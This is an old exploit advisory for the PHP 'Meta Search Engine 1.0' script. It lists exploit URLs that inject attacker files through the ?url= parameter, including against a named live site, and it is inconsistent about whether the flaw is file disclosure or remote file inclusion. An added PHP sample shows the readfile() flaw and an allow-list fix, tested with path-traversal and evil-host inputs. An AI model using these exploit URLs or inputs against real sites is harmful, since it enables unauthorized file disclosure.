# Title : Meta Search Engine Script (url) Local File Disclosure Vulnerability
# Published : 2009-07-21
# Author : Moudi
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
                           IN THE NAME OF ALLAH
==============================================================================
[+] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[+] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================
[+] Script: [ Meta Search Engine 1.0 ]
[+] Language: [ PHP ]
[+] Download: [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1 ]
[+] Founder: [ Moudi <m0udi@9.cn> ]
[+] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ... ]
[+] Team: [ EvilWay ]
[+] Dork: [ OFF ]
[+] Price: [ USD 12.99 ]
[+] Site: [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit RFI + LIVE : vulnerability ]===
[+] http://www.site.com/patch/?url=[RFI]&file=Search
[+] http://www.site.com/patch/index.php?url=[RFI]&file=Search
[+] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[+] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search
Author: Moudi
###########################################################################
note: readfile($url) is the issue, so this is a file disclosure (readfile() writes the file's contents into the response rather than executing it)
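How the flaw arises and one way to close it, as an added example that is not the script's own code: the vulnerable pattern hands the `url` request parameter straight to `readfile()`, while the hardened version only accepts keys from a fixed allow-list of local files and verifies the resolved path stays inside the template directory. The parameter name `url` comes from the advisory; the function names, `$baseDir` and the template file names are assumptions.

```php
<?php
// Vulnerable pattern (as described in the advisory): the raw ?url= value goes to
// readfile(). readfile() streams the file's bytes to the client, so any file the
// web server can read (or any remote URL, if allow_url_fopen is on) is disclosed.
function vulnerable_fetch(string $url): void
{
    readfile($url);
}

// Hardened: `url` is a lookup key, never a path. Unknown keys are rejected before
// any filesystem call, and even an allow-listed entry must resolve under $baseDir.
const ALLOWED_PAGES = [            // assumed template names, not from the script
    'Search'  => 'search.html',
    'Results' => 'results.html',
];

function safe_fetch(string $url, string $baseDir): ?string
{
    if (!array_key_exists($url, ALLOWED_PAGES)) {
        return null;                                   // unknown key: read nothing
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$url]);
    if ($base === false || $path === false) {
        return null;                                   // missing dir or file
    }
    // Defense in depth: the resolved path must start with "<baseDir>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return file_get_contents($path);
}

// Constructed demonstration: a temporary template directory with one allowed page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'metasearch_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/search.html', "<h1>search form</h1>\n");

var_dump(safe_fetch('Search', $dir) !== null);          // bool(true): allow-listed
var_dump(safe_fetch('../../etc/passwd', $dir) === null); // bool(true): not a key
var_dump(safe_fetch('http://evil.example/x.txt', $dir) === null); // bool(true)

unlink($dir . '/search.html');
rmdir($dir);
```

In the real script the call site would be `safe_fetch($_GET['url'] ?? '', __DIR__ . '/templates')` with a 400 response when it returns null.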
# www.Syue.com [2009-07-21]